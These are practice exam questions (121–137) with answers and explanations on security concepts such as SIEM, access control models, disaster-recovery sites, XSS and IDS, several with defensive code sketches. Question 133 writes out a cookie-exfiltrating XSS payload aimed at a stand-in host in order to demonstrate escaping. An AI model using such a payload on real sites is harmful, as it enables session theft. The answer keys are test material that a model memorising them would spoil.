Question 121
Which of the following best describes a Security Information and Event Management (SIEM) system?
A) A system that encrypts all network traffic
B) A tool that collects, analyzes, and correlates security events from multiple sources
C) A firewall that blocks unauthorized access
D) A backup management solution
Answer: B) A tool that collects, analyzes, and correlates security events from multiple sources
Explanation:
A Security Information and Event Management (SIEM) system is a centralized cybersecurity platform designed to collect, aggregate, and analyze logs and events from a wide variety of sources, including servers, firewalls, intrusion detection systems, endpoints, databases, and applications. By consolidating this information, SIEM provides organizations with a unified view of their IT environment, enabling real-time monitoring of security events and early detection of potential threats or anomalies.
SIEM systems use correlation rules, behavioral analytics, and pattern recognition to identify suspicious activity that might otherwise go unnoticed. These capabilities allow security teams to detect advanced persistent threats, insider threats, and other malicious activities in real time. Once detected, alerts generated by the SIEM system support rapid incident response, helping organizations contain threats, reduce potential damage, and minimize downtime.
Beyond real-time monitoring, SIEM also supports forensic investigations by maintaining detailed logs of historical events. This enables security analysts to trace the origin and progression of incidents, identify compromised systems, and understand attack methodologies. Additionally, SIEM plays a crucial role in regulatory compliance by providing audit-ready reports, documenting access controls, and demonstrating adherence to industry standards such as PCI DSS, HIPAA, or ISO 27001.
Effective SIEM implementation requires careful configuration, continuous tuning of correlation rules, and regular review of alerts to minimize false positives while ensuring meaningful notifications. Organizations can also integrate SIEM with other security tools, such as threat intelligence platforms and endpoint detection and response (EDR) systems, to enhance its capabilities.
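As an illustration of the correlation logic described above, the following minimal sketch flags a burst of failed logins followed by a success from the same source, a classic brute-force pattern. The event fields, window, and threshold are hypothetical; production SIEMs express such rules in their own query or rule languages.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical normalized events, as a SIEM might receive them after log parsing.
events = [
    {"time": datetime(2024, 1, 1, 9, 0, s), "src_ip": "203.0.113.5",
     "action": "login_failure"} for s in range(0, 50, 10)
] + [{"time": datetime(2024, 1, 1, 9, 1, 0), "src_ip": "203.0.113.5",
      "action": "login_success"}]

WINDOW = timedelta(minutes=5)   # correlation window (a tunable threshold)
THRESHOLD = 5                   # failed attempts before we care

failures = defaultdict(deque)   # src_ip -> timestamps of recent failures

for ev in sorted(events, key=lambda e: e["time"]):
    q = failures[ev["src_ip"]]
    # Drop failures that fell outside the correlation window.
    while q and ev["time"] - q[0] > WINDOW:
        q.popleft()
    if ev["action"] == "login_failure":
        q.append(ev["time"])
    elif ev["action"] == "login_success" and len(q) >= THRESHOLD:
        # Correlation hit: many failures then a success -> possible brute force.
        print(f"ALERT: possible credential brute force from {ev['src_ip']}")
```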
Overall, a SIEM system enhances visibility, strengthens threat detection, improves incident response, and supports informed decision-making for cybersecurity strategy, making it a central component of modern organizational security operations.
Question 122
Which access control model enforces mandatory rules based on data classification and user clearance levels?
A) Discretionary Access Control (DAC)
B) Mandatory Access Control (MAC)
C) Role-Based Access Control (RBAC)
D) Attribute-Based Access Control (ABAC)
Answer: B) Mandatory Access Control (MAC)
Explanation:
Mandatory Access Control (MAC) is a highly secure access control model in which access decisions are strictly governed by system-enforced policies rather than by the discretion of individual users. In this model, every piece of data is assigned a security classification, such as Confidential, Secret, or Top Secret, and every user is assigned a clearance level corresponding to their authorization and trustworthiness. Users can access only the data for which their clearance meets or exceeds the classification level, and they cannot override, bypass, or modify these permissions. This strict control ensures that sensitive information is protected from unauthorized access, reducing the risk of accidental disclosure or deliberate misuse.
MAC is commonly implemented in government, military, and other high-security environments where maintaining strict confidentiality and integrity of information is critical. For example, intelligence agencies often rely on MAC to ensure that sensitive national security information is accessible only to authorized personnel, preventing lower-level employees or contractors from accessing highly classified materials. Beyond controlling access, MAC also supports detailed auditing and logging capabilities, enabling organizations to track user activity, monitor access patterns, and detect potential security violations. This makes it easier to investigate incidents, enforce accountability, and comply with regulatory requirements. By enforcing access policies at the system level rather than leaving decisions to individual users, MAC provides a robust, consistent, and highly reliable method for protecting critical information assets, particularly in environments where data security cannot be compromised under any circumstances.
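The core MAC comparison can be illustrated with a minimal sketch, assuming a simple linear ordering of classification labels (real implementations such as SELinux or Trusted Solaris also evaluate categories and compartments):

```python
# Hypothetical linear classification lattice; higher number = more sensitive.
LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}

def can_read(user_clearance: str, data_classification: str) -> bool:
    """System-enforced rule: clearance must meet or exceed classification."""
    return LEVELS[user_clearance] >= LEVELS[data_classification]

print(can_read("Secret", "Confidential"))      # True: clearance dominates label
print(can_read("Confidential", "Top Secret"))  # False: denied by the system
```

The decision is made by the system from the labels alone; unlike DAC, no user or data owner can grant an exception.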
Question 123
Which of the following best describes phishing attacks?
A) Exploiting software vulnerabilities
B) Sending fraudulent messages to trick users into revealing sensitive information
C) Using malware to encrypt files
D) Intercepting network traffic
Answer: B) Sending fraudulent messages to trick users into revealing sensitive information
Explanation:
Phishing is a form of social engineering attack in which attackers manipulate individuals into revealing sensitive information such as usernames, passwords, financial data, or other confidential details. Rather than exploiting technical vulnerabilities, phishing targets human behavior, relying on deception, urgency, or trust to trick users into taking actions that compromise security. Attackers often impersonate trusted entities, such as banks, colleagues, or well-known service providers, using emails, messaging applications, phone calls, or fake websites that appear legitimate.
There are several common variants of phishing attacks. Spear phishing targets specific individuals or small groups, tailoring messages based on research about the target to increase credibility and success rates. Whaling attacks focus on high-profile executives or decision-makers, aiming to gain access to sensitive corporate information or authorize fraudulent transactions. Clone phishing involves replicating a legitimate message previously sent to the victim, altering it with malicious links or attachments to deceive recipients. Other evolving techniques include vishing (voice phishing) and smishing (SMS phishing).
Because phishing exploits human factors, user awareness and training are critical components of defense. Organizations implement multiple mitigation strategies to reduce the risk and impact of phishing attacks. Employee education programs, simulated phishing exercises, and awareness campaigns help users recognize suspicious messages. Technical controls such as multi-factor authentication (MFA), email filters, URL inspection tools, and verification procedures further protect sensitive data.
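As a rough illustration of the URL inspection mentioned above, the sketch below flags lookalike hostnames that embed a trusted brand name. The domains and the single heuristic are hypothetical; real filters combine many more signals (domain reputation, registration age, TLS certificate data, content analysis).

```python
from urllib.parse import urlparse

# Hypothetical allow-list of domains the organization actually uses.
TRUSTED = {"example-bank.com", "mail.example.com"}

def looks_suspicious(url: str) -> bool:
    host = urlparse(url).hostname or ""
    if host in TRUSTED:
        return False
    # Simple lookalike check: a trusted brand embedded in an untrusted host.
    return any(t.split(".")[0] in host for t in TRUSTED)

print(looks_suspicious("https://example-bank.com.login-verify.net/reset"))  # True
print(looks_suspicious("https://mail.example.com/inbox"))                   # False
```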
Regular phishing simulations reinforce vigilance, allowing organizations to assess their preparedness and identify areas for improvement. By combining education, technological safeguards, and proactive monitoring, organizations can reduce the likelihood of successful phishing attacks, protect confidential information, and strengthen their overall cybersecurity posture.
Question 124
Which type of malware is designed to secretly monitor user activities and report back to an attacker?
A) Spyware
B) Worm
C) Ransomware
D) Trojan
Answer: A) Spyware
Explanation:
Spyware is a type of malicious software designed to secretly monitor and collect information about a user’s activity without their knowledge or consent. It can capture a wide range of sensitive data, including keystrokes, browsing habits, login credentials, financial information, personal identification details, and other confidential data, and then transmit this information to attackers for malicious purposes. Spyware can be installed on a system through various methods, including phishing emails, malicious downloads, infected websites, or by being bundled with seemingly legitimate software. Once installed, spyware can operate covertly in the background, often slowing system performance, altering settings, or opening backdoors for additional malware.
The impact of spyware extends beyond individual privacy breaches. Organizations can suffer data leaks, intellectual property theft, and unauthorized access to internal networks. Individuals are at risk of identity theft, financial fraud, and compromise of personal communications. Combating spyware requires a multi-layered approach. Endpoint protection, up-to-date antivirus software, and regular system scanning are essential to detect and remove spyware before it causes damage.
User education is equally important, as many infections occur due to unsafe downloading practices, clicking on suspicious links, or failing to recognize phishing attempts. Implementing strict software installation policies, regularly updating operating systems and applications, and monitoring network activity can further reduce the risk of spyware infiltration. Because spyware often operates silently, ongoing vigilance and comprehensive security controls are critical to prevent continuous monitoring, unauthorized data collection, and potential long-term damage to both personal and organizational systems.
Question 125
Which of the following is the most effective method for mitigating man-in-the-middle (MITM) attacks?
A) Using strong encryption and certificate validation
B) Installing antivirus software
C) Implementing firewalls only
D) Limiting physical access to servers
Answer: A) Using strong encryption and certificate validation
Explanation:
Man-in-the-middle (MITM) attacks occur when an attacker secretly intercepts, relays, or modifies communications between two parties, often without either party realizing the compromise. These attacks can target a variety of communication channels, including web traffic, emails, instant messaging, or other network-based interactions. By positioning themselves between the sender and receiver, attackers can steal sensitive information such as login credentials, financial data, or personal details, as well as manipulate transactions or inject malicious content, potentially causing financial or reputational harm.
The most effective mitigation against MITM attacks involves the use of strong encryption protocols such as TLS (Transport Layer Security), the successor to the now-deprecated SSL (Secure Sockets Layer), which secure data in transit and prevent attackers from reading or modifying intercepted messages. Certificate validation ensures that users are communicating with legitimate parties, while mutual authentication—where both parties verify each other’s identities—further reduces the risk of impersonation. Virtual Private Networks (VPNs) and secure network configurations provide additional layers of protection, particularly when using untrusted or public networks.
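Using Python's standard ssl module as an example, the default client context performs exactly the certificate and hostname validation described here; disabling those checks is what reopens the door to MITM interception. The target host is a placeholder.

```python
import socket
import ssl

# The default context enables certificate validation and hostname checking,
# which is the core protection against a classic MITM attempt.
context = ssl.create_default_context()

with socket.create_connection(("example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())        # e.g. 'TLSv1.3'
        cert = tls.getpeercert()
        print(cert["subject"])      # details of the validated server certificate
```

Setting check_hostname to False or verify_mode to CERT_NONE would silently accept an attacker's certificate, which is why such overrides should never appear in production code.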
Monitoring network traffic for unusual patterns or anomalies is another key defense strategy, helping to detect potential MITM activity early. Technical safeguards must be complemented by user education and training, as awareness of phishing attempts, suspicious links, and insecure connections significantly reduces the likelihood of compromise.
By correctly implementing encryption, authentication, and monitoring, organizations can ensure the confidentiality, integrity, and authenticity of communications. A combination of proactive technical measures and informed user behavior establishes a robust defense against MITM attacks, safeguarding sensitive data and maintaining trust in digital communications.
Question 126
Which security model prevents a subject at a lower integrity level from writing data to a higher integrity level?
A) Bell-LaPadula
B) Biba
C) Clark-Wilson
D) Brewer and Nash
Answer: B) Biba
Explanation:
The Biba integrity model is a security framework that focuses on preserving the integrity of data within an information system. Unlike confidentiality-based models such as Bell-LaPadula, which aim to prevent unauthorized access to sensitive information, Biba’s primary objective is to prevent the corruption of data by ensuring that it remains accurate, consistent, and trustworthy. Its central rule, the star integrity property, is often summarized as “no write up”: subjects at lower integrity levels are prohibited from writing to objects at higher integrity levels. This prevents highly trusted or sensitive data from being modified by less trustworthy sources.
Complementing the “no write up” rule, Biba also incorporates the “no read down” principle (the simple integrity property), which prevents subjects from reading data at lower integrity levels, thereby reducing the risk of using potentially unverified or untrusted data. Together, these rules enforce strict integrity policies, ensuring that data flows in a manner that maintains trustworthiness throughout the system.
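A minimal sketch of these two rules, assuming a simple linear integrity lattice (the levels and names are hypothetical):

```python
# Hypothetical integrity lattice; higher number = more trusted data/subjects.
INTEGRITY = {"untrusted": 0, "user": 1, "system": 2}

def biba_allows(op: str, subject_level: str, object_level: str) -> bool:
    s, o = INTEGRITY[subject_level], INTEGRITY[object_level]
    if op == "write":
        return s >= o   # no write up: cannot modify more-trusted objects
    if op == "read":
        return s <= o   # no read down: cannot consume less-trusted data
    raise ValueError(op)

print(biba_allows("write", "user", "system"))    # False: write up blocked
print(biba_allows("read", "user", "untrusted"))  # False: read down blocked
```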
The Biba model is commonly applied in environments where accurate and uncorrupted data is critical, such as financial systems, industrial control systems, healthcare applications, and scientific research platforms. Implementing the Biba model involves defining integrity levels for both subjects and objects, enforcing access control rules based on these levels, and auditing system modifications to detect violations or unauthorized changes.
By systematically controlling how data can be read or modified according to integrity levels, the Biba model helps organizations maintain reliable information, prevent accidental or malicious corruption, and ensure compliance with regulatory or operational standards. Overall, it provides a structured approach to safeguarding data integrity, complementing confidentiality and availability measures within a comprehensive security strategy.
Question 127
Which type of backup captures all changes since the last full backup?
A) Full backup
B) Differential backup
C) Incremental backup
D) Snapshot backup
Answer: B) Differential backup
Explanation:
A differential backup is a type of data backup that captures all the changes made since the last full backup. This approach differs from incremental backups, which only record the changes made since the most recent backup of any type, whether full or incremental. Because differential backups include all changes since the last full backup, they tend to grow larger over time compared to incremental backups. However, this characteristic makes differential backups much simpler and faster to restore. During recovery, only the last full backup and the most recent differential backup are required, eliminating the need to sequentially apply multiple incremental backups. This reduces the risk of errors during restoration and can significantly speed up the recovery process.
Organizations often implement differential backups as part of a broader data protection strategy to balance several factors, including storage usage, backup time, and recovery speed. While differential backups consume more storage than incremental backups, they offer a compromise between the fast restoration of full backups and the storage efficiency of incremental backups. Proper scheduling of differential backups is crucial; for example, a weekly full backup combined with daily differential backups is a common approach to ensure timely recovery while managing storage requirements.
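The selection logic that distinguishes a differential from an incremental backup can be sketched as follows, assuming file modification times are a reliable change indicator (production tools typically rely on archive bits, checksums, or block-level tracking instead):

```python
import time
from pathlib import Path

def differential_candidates(root: str, last_full_backup: float) -> list[Path]:
    """Select everything changed since the LAST FULL backup -- not since the
    last differential. This is what keeps a restore down to just the full
    backup plus the newest differential."""
    changed = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.stat().st_mtime > last_full_backup:
            changed.append(path)
    return changed

# Example: files touched in the week since Sunday's full backup.
last_full = time.time() - 7 * 24 * 3600
for f in differential_candidates(".", last_full):
    print(f)
```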
Equally important is regular testing of backups. Testing ensures that the backup files are complete, consistent, and fully restorable in the event of hardware failure, cyberattacks, or other disasters. Without periodic verification, organizations may discover too late that backups are corrupted, incomplete, or otherwise unusable. In summary, differential backups provide a practical and efficient solution for organizations seeking a reliable, easily restorable backup system that balances storage demands with operational efficiency and risk mitigation.
Question 128
Which of the following best describes a cold site in disaster recovery planning?
A) A fully operational backup facility
B) A site with basic infrastructure but no pre-installed systems or data
C) A mobile temporary recovery facility
D) A cloud-based failover system
Answer: B) A site with basic infrastructure but no pre-installed systems or data
Explanation:
A cold site is a type of disaster recovery (DR) facility designed to provide an organization with an alternate location for operations in the event of a disaster or system failure. Unlike hot or warm sites, a cold site offers only the essential infrastructure, such as power, cooling, network connectivity, and physical space, but it does not include pre-installed hardware, software, or live data. As a result, activating a cold site requires transporting and setting up servers, workstations, and other IT equipment, as well as restoring data from backups before operations can resume. This process generally leads to longer recovery times compared to warm or hot sites, making cold sites suitable for organizations that can tolerate extended downtime without significant operational impact.
Despite the longer recovery period, cold sites are often chosen for their cost-effectiveness. Since they do not require the continuous maintenance of active systems or up-to-date data replication, ongoing operational expenses are relatively low. Organizations can maintain a cold site as an emergency backup while focusing resources on primary systems.
Effective cold site planning involves careful preparation, including documenting recovery procedures, ensuring backup data integrity, arranging equipment logistics, and establishing communication protocols. Regular testing and drills are essential to validate that personnel can quickly deploy hardware, restore software, and recover critical applications during an actual disaster. By addressing these considerations, organizations can reduce potential downtime, minimize data loss, and maintain business continuity even when a cold site is the chosen disaster recovery strategy.
Question 129
Which of the following best describes a warm site in disaster recovery planning?
A) A site with basic infrastructure only
B) A fully operational backup site ready for immediate use
C) A site with partial pre-installed systems and recent backups
D) A mobile temporary facility
Answer: C) A site with partial pre-installed systems and recent backups
Explanation:
A warm site is a type of disaster recovery facility that provides pre-installed hardware, software, and network infrastructure, along with regular backups of critical data. Unlike a cold site, which requires organizations to install and configure systems from scratch, a warm site is partially configured and maintained, allowing for a quicker resumption of operations in the event of a disaster. While it does not offer the instant readiness of a hot site, a warm site strikes a balance between cost and recovery speed, making it a practical solution for medium-priority business functions that cannot afford prolonged downtime but do not require full 24/7 availability.
Warm sites rely on regular synchronization of data and system updates to ensure that information is relatively current. This often involves automated data replication or scheduled transfers from the primary site. Maintenance of hardware, software, and network configurations is also essential to keep the site operational and compatible with the organization’s production environment. Additionally, routine testing of the warm site ensures that systems can be activated efficiently and reliably when needed. Such tests help identify potential issues, including software incompatibilities, hardware failures, or network misconfigurations, before an actual disaster occurs.
By providing a partially ready environment, warm sites enable organizations to reduce downtime and resume critical operations faster than cold sites while avoiding the higher costs associated with hot sites. They are especially useful for businesses that need to maintain continuity for essential services but can tolerate a short delay in recovery. Overall, warm sites offer a practical, cost-effective, and moderately fast disaster recovery option, combining pre-configured infrastructure with ongoing data synchronization and testing to ensure operational readiness when emergencies strike.
Question 130
Which of the following access control models assigns permissions based on job functions and responsibilities?
A) Discretionary Access Control (DAC)
B) Mandatory Access Control (MAC)
C) Role-Based Access Control (RBAC)
D) Attribute-Based Access Control (ABAC)
Answer: C) Role-Based Access Control (RBAC)
Explanation:
Role-Based Access Control (RBAC) is a widely used access management framework that assigns system permissions to users based on their roles within an organization. In RBAC, each role is defined with a specific set of privileges necessary to perform the job functions associated with that role. Users inherit the permissions of the roles they are assigned, ensuring that they can only access the data, applications, and resources required for their responsibilities. This approach enforces the principle of least privilege, helping to minimize the risk of unauthorized access, accidental misuse, or data breaches.
One of the key benefits of RBAC is its ability to simplify access management. By grouping users into roles rather than assigning individual permissions, organizations reduce administrative complexity and the potential for errors in manual access assignments. For example, in a corporate environment, an “HR Manager” role might be granted access to employee records, payroll systems, and reporting tools, while an “IT Support” role would have permissions limited to system configuration, troubleshooting tools, and user support functions. This clear separation of duties not only enhances security but also supports compliance with regulatory requirements.
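A minimal sketch of the role-to-permission indirection described above; the roles, permissions, and users are hypothetical:

```python
# Hypothetical role-to-permission mapping; users inherit via role assignment.
ROLE_PERMISSIONS = {
    "hr_manager": {"read_employee_records", "run_payroll", "view_reports"},
    "it_support": {"configure_systems", "reset_passwords", "view_tickets"},
}

USER_ROLES = {"alice": {"hr_manager"}, "bob": {"it_support"}}

def is_authorized(user: str, permission: str) -> bool:
    # A user is authorized if any assigned role grants the permission.
    return any(permission in ROLE_PERMISSIONS[r] for r in USER_ROLES.get(user, ()))

print(is_authorized("alice", "run_payroll"))  # True via the hr_manager role
print(is_authorized("bob", "run_payroll"))    # False: outside bob's role
```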
RBAC also provides flexibility and scalability. When employees change responsibilities, receive promotions, or transfer to different departments, access rights can be adjusted efficiently by updating role assignments rather than modifying individual permissions for each user. Additionally, RBAC supports auditing and accountability, as administrators can easily track which roles have access to specific resources and identify any unusual or unauthorized activity.
Overall, RBAC is a practical and efficient access control model that balances security, operational efficiency, and compliance by structuring permissions around organizational roles rather than individual users, providing both control and adaptability in managing system access.
Question 131
Which of the following best describes a hot site in disaster recovery planning?
A) A site with basic infrastructure only
B) A site with partially installed systems and recent backups
C) A fully operational backup facility with real-time data replication
D) A mobile temporary facility
Answer: C) A fully operational backup facility with real-time data replication
Explanation:
A hot site is a fully operational disaster recovery facility that maintains complete infrastructure, including servers, storage, network hardware, and software, along with real-time or near-real-time replication of critical systems and data from the primary site. Unlike cold or warm sites, a hot site is continuously updated and ready to take over operations almost immediately following a disaster. This design allows organizations to minimize downtime and maintain business continuity, ensuring that critical operations can continue with little to no interruption. Due to the need for duplicate hardware, software licenses, network configurations, and ongoing data synchronization, hot sites are the most expensive type of recovery site, but they provide the fastest recovery capabilities.
Hot sites are particularly crucial for organizations with strict Recovery Time Objectives (RTOs), high availability requirements, or mission-critical systems that cannot tolerate prolonged outages. Examples include financial institutions, healthcare providers, e-commerce platforms, and cloud service providers, all of which rely on continuous access to systems and data to prevent financial loss, regulatory penalties, or reputational damage. By maintaining fully up-to-date copies of applications and data, hot sites ensure that services remain accessible even during catastrophic events such as natural disasters, cyberattacks, or infrastructure failures.
In addition to hardware and software readiness, successful hot sites require regular testing, monitoring, and maintenance to verify that systems function correctly and that data replication remains consistent. This proactive approach ensures that the disaster recovery plan works as intended and that any potential issues can be resolved before an actual emergency occurs. Overall, hot sites provide organizations with the highest level of preparedness, enabling near-instantaneous recovery and uninterrupted service for critical business functions, albeit at a significant cost.
Question 132
Which of the following best describes a zero-day vulnerability?
A) A vulnerability that has been publicly disclosed and patched
B) A vulnerability unknown to the vendor with no available patch
C) A vulnerability affecting only legacy systems
D) A vulnerability exploited after patching
Answer: B) A vulnerability unknown to the vendor with no available patch
Explanation:
A zero-day vulnerability is a security flaw in software, hardware, or firmware that is unknown to the vendor or developer, meaning no official patch, fix, or mitigation is available at the time of discovery. Because there is no vendor-provided defense, attackers can exploit these vulnerabilities immediately, often causing severe consequences. Exploitation can lead to system compromise, data theft, privilege escalation, unauthorized access, ransomware deployment, or other forms of malicious activity. High-profile instances of zero-day exploitation include the Stuxnet worm, which leveraged multiple zero-day vulnerabilities to disrupt industrial control systems, and the EternalBlue exploit, developed against a then-undisclosed Windows SMB vulnerability and later used in the widespread WannaCry ransomware attack.
Zero-day vulnerabilities are particularly dangerous because organizations cannot rely on traditional patching or updates for protection. The absence of an official fix creates a window of opportunity for attackers, making proactive defense strategies critical. Organizations can implement multiple layers of defense to reduce the risk and impact of exploitation. Intrusion detection and prevention systems (IDS/IPS), endpoint protection platforms, and behavioral monitoring can help identify unusual or suspicious activity that may indicate a zero-day attack. Network segmentation and strict access controls further limit the potential damage if a zero-day is exploited.
Threat intelligence feeds and ongoing vulnerability research are also valuable for detecting emerging zero-day exploits, allowing organizations to apply temporary mitigations, such as disabling vulnerable features, implementing workarounds, or enhancing monitoring for abnormal behavior. Employee awareness and security training can further reduce risk by helping staff recognize suspicious activity.
Question 133
Which type of attack involves injecting malicious scripts into web applications viewed by other users?
A) Cross-site scripting (XSS)
B) SQL injection
C) Man-in-the-middle attack
D) Phishing
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting (XSS) attacks occur when attackers inject malicious scripts into web pages that are subsequently viewed by other users. These scripts can steal sensitive information, such as cookies, session tokens, or user credentials, and can also manipulate page content to perform unauthorized actions on behalf of the user. XSS attacks exploit vulnerabilities in web applications, often caused by insufficient input validation or improper output encoding, allowing attackers to execute scripts in the context of a victim’s browser.
There are three main types of XSS attacks. Stored XSS, also called persistent XSS, occurs when malicious scripts are permanently stored on a server, such as in databases, message boards, or user profiles, and executed whenever a user accesses the infected content. Reflected XSS involves scripts embedded in a URL or request that are immediately reflected back and executed by the browser, often through phishing or malicious links. DOM-based XSS occurs entirely on the client side, where scripts manipulate the Document Object Model (DOM) of a web page, executing in the victim’s browser without direct server involvement.
Mitigation of XSS attacks requires a combination of secure coding practices and browser-level defenses. Developers should rigorously validate and sanitize user inputs, encode outputs, and implement proper context-aware escaping. Content Security Policies (CSPs) can help restrict the execution of untrusted scripts and reduce the impact of potential XSS vulnerabilities. Regular security testing, including penetration tests and automated scanning, is essential to identify and remediate weaknesses before attackers can exploit them.
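As a small example of the output encoding mentioned above, Python's standard html.escape renders an injected payload inert when placed in HTML body content (attribute, JavaScript, and URL contexts each require their own context-aware encoder):

```python
import html

# A hypothetical attacker-supplied comment containing a cookie-stealing script.
user_input = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Escaping for the HTML body context: the browser now renders the payload
# as harmless text instead of executing it.
safe = html.escape(user_input)
print(f"<p>Comment: {safe}</p>")
# -> <p>Comment: &lt;script&gt;...&lt;/script&gt;</p>
```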
XSS attacks emphasize the importance of web application security, demonstrating that even seemingly minor vulnerabilities can compromise user data and trust. By adopting robust input validation, output encoding, and security-focused development practices, organizations can protect users against client-side threats and maintain the integrity and reliability of their web applications.
Question 134
Which security model focuses on maintaining the integrity of data through well-formed transactions and auditing?
A) Bell-LaPadula
B) Clark-Wilson
C) Biba
D) Brewer and Nash
Answer: B) Clark-Wilson
Explanation:
The Clark-Wilson security model is designed to enforce data integrity in information systems by ensuring that all modifications to critical data are performed in a controlled, authorized manner. Its core principle is the use of well-formed transactions, which guarantee that data remains consistent, accurate, and trustworthy after any operation. Unlike models that focus solely on access restrictions, Clark-Wilson emphasizes that only specific, authorized programs—known as Transformation Procedures (TPs)—can modify protected data. This ensures that all changes are legitimate and conform to predefined business rules and policies.
Another key feature of the Clark-Wilson model is the enforcement of separation of duties. By dividing responsibilities among multiple users and processes, the model prevents a single individual from performing actions that could compromise data integrity or enable fraudulent activities. In addition, the model requires auditing and certification of transactions to verify that all operations comply with organizational policies. This auditing process provides accountability, transparency, and evidence that proper procedures were followed.
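A toy sketch of a Transformation Procedure, using a hypothetical account balance as the constrained data item: the TP is the only code path permitted to modify the data, it rejects ill-formed transactions, and every invocation is audited.

```python
import logging

logging.basicConfig(level=logging.INFO)
AUDIT = logging.getLogger("audit")

balances = {"acct-001": 500}   # a constrained data item (CDI)

def tp_transfer(actor: str, src: str, dst: str, amount: int) -> None:
    """A Transformation Procedure: the only code allowed to change balances,
    enforcing well-formedness and logging every attempt for audit."""
    if amount <= 0 or balances.get(src, 0) < amount:
        AUDIT.warning("REJECTED transfer by %s: %s->%s %d", actor, src, dst, amount)
        raise ValueError("ill-formed transaction")
    balances[src] -= amount
    balances[dst] = balances.get(dst, 0) + amount
    AUDIT.info("transfer by %s: %s->%s %d", actor, src, dst, amount)

tp_transfer("clerk-7", "acct-001", "acct-002", 200)   # well-formed: allowed
```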
The Clark-Wilson model is particularly suited to commercial, financial, and regulatory environments, where the accuracy and reliability of data are essential for business operations, compliance, and decision-making. Examples include banking systems, payroll applications, and accounting software, where improper or unauthorized data modifications could result in significant financial or operational risks.
By combining controlled access through Transformation Procedures, enforcement of separation of duties, and auditing mechanisms, the Clark-Wilson model provides a practical framework to prevent unauthorized modifications, fraud, and errors. It ensures that critical data remains reliable and trustworthy, supporting the integrity and accountability required in high-stakes business environments.
Question 135
Which type of malware encrypts a victim’s files and demands payment for decryption?
A) Worm
B) Trojan
C) Ransomware
D) Spyware
Answer: C) Ransomware
Explanation:
Ransomware is a type of malicious software designed to disrupt access to a victim’s data or systems by encrypting files or locking users out of critical resources. Attackers then demand a ransom, typically in cryptocurrency, in exchange for restoring access. Ransomware can spread through a variety of attack vectors, including phishing emails, malicious attachments or downloads, compromised websites, and exploiting network vulnerabilities or unpatched software. Once executed, ransomware can rapidly propagate across networks, potentially affecting multiple systems and causing widespread operational disruption.
The consequences of a ransomware attack can be severe, impacting organizational operations, finances, and reputation. Beyond the immediate operational downtime, organizations may face regulatory penalties, data loss, and erosion of customer trust. High-profile ransomware incidents have demonstrated that even well-prepared organizations are vulnerable without robust preventive measures.
Preventive strategies focus on reducing attack surfaces and improving resilience. Regular and verified backups ensure that critical data can be restored without paying a ransom. Endpoint protection, intrusion detection systems, timely patch management, network segmentation, and access controls help prevent the initial infection or limit its spread. User education and phishing awareness training are crucial, as social engineering is a primary attack vector.
Incident response planning is equally important. Response plans should define steps for containment, investigation, data recovery, and communication while explicitly avoiding ransom payments, which can encourage further attacks. Coordinated testing of these plans ensures readiness in the event of an incident.
By combining technical controls, procedural safeguards, and policy enforcement, organizations can mitigate the risks associated with ransomware, maintain business continuity, and minimize financial and operational impact, ensuring that systems remain resilient against this increasingly prevalent threat.
Question 136
Which of the following best describes an Intrusion Detection System (IDS)?
A) A device that blocks unauthorized traffic
B) A system that detects and alerts on suspicious network or system activity
C) A tool that encrypts sensitive data
D) A backup and recovery tool
Answer: B) A system that detects and alerts on suspicious network or system activity
Explanation:
An Intrusion Detection System (IDS) is a security tool that monitors network traffic and host activity to identify malicious behavior, policy violations, or unusual actions that could indicate a security threat. IDS can be classified into two main types: network-based IDS (NIDS), which monitors network packets for suspicious patterns, and host-based IDS (HIDS), which observes activity on individual computers or servers, such as system logs, file changes, or user behavior. Unlike firewalls, which actively block or filter traffic, an IDS primarily generates alerts to notify security teams of potential threats, allowing for timely investigation and response.
IDS employs multiple detection techniques to identify security incidents. Signature-based detection compares activity against a database of known attack patterns, providing reliable identification of familiar threats. Anomaly detection identifies deviations from established baseline behavior, helping to uncover previously unknown or zero-day attacks. Behavioral monitoring focuses on user or system actions that may indicate malicious intent, such as unauthorized access attempts or unusual application usage.
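A minimal sketch of signature-based detection over log lines; the two patterns are hypothetical stand-ins for the far richer rule languages of real systems such as Snort or Suricata:

```python
import re

# Hypothetical signature set: name -> pattern of a known attack technique.
SIGNATURES = {
    "sql_injection": re.compile(r"union\s+select|or\s+1=1", re.IGNORECASE),
    "path_traversal": re.compile(r"\.\./\.\./"),
}

def inspect(log_line: str) -> list[str]:
    return [name for name, pat in SIGNATURES.items() if pat.search(log_line)]

for line in [
    "GET /search?q=laptops HTTP/1.1",
    "GET /item?id=1 UNION SELECT password FROM users HTTP/1.1",
]:
    hits = inspect(line)
    if hits:
        print(f"ALERT {hits}: {line}")   # alert only -- an IDS does not block
```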
By providing continuous monitoring and alerting, IDS enhances an organization’s situational awareness and supports incident response efforts. It also plays a crucial role in forensic investigations by maintaining records of network and host activity, which can be analyzed to understand the scope and origin of attacks.
Effective IDS deployment requires proper configuration, integration with other security tools such as Security Information and Event Management (SIEM) systems, and ongoing tuning to reduce false positives and ensure alerts are actionable. When implemented correctly, an IDS helps organizations detect and respond to threats more efficiently, protecting critical assets and supporting a comprehensive cybersecurity strategy.
Question 137
Which of the following attacks involves an attacker secretly intercepting and potentially altering communications between two parties?
A) Phishing
B) Man-in-the-middle attack
C) Replay attack
D) Denial-of-service attack
Answer: B) Man-in-the-middle attack
Explanation:
A man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts communications between two parties, positioning themselves between the sender and receiver to eavesdrop, alter, or manipulate transmitted data without detection. These attacks can compromise both the confidentiality and integrity of communications, enabling attackers to steal credentials, manipulate transactions, hijack sessions, inject malicious content, or exfiltrate sensitive information. MITM attacks can target various communication channels, including web traffic, emails, instant messaging, and other network-based interactions.
One of the most effective ways to prevent MITM attacks is the use of strong encryption protocols, such as TLS (Transport Layer Security) or its now-deprecated predecessor SSL (Secure Sockets Layer), which ensure that intercepted data cannot be read or modified. Certificate validation is also critical to verify the authenticity of communicating parties, preventing attackers from impersonating legitimate services. Additional protections include mutual authentication, where both parties validate each other’s identities, and secure Virtual Private Networks (VPNs) to protect data over untrusted networks.
Organizations should also implement network monitoring and anomaly detection to identify unusual patterns of traffic or potential MITM activity. Logging and alerting systems help detect early signs of interception, providing time to respond before significant damage occurs.
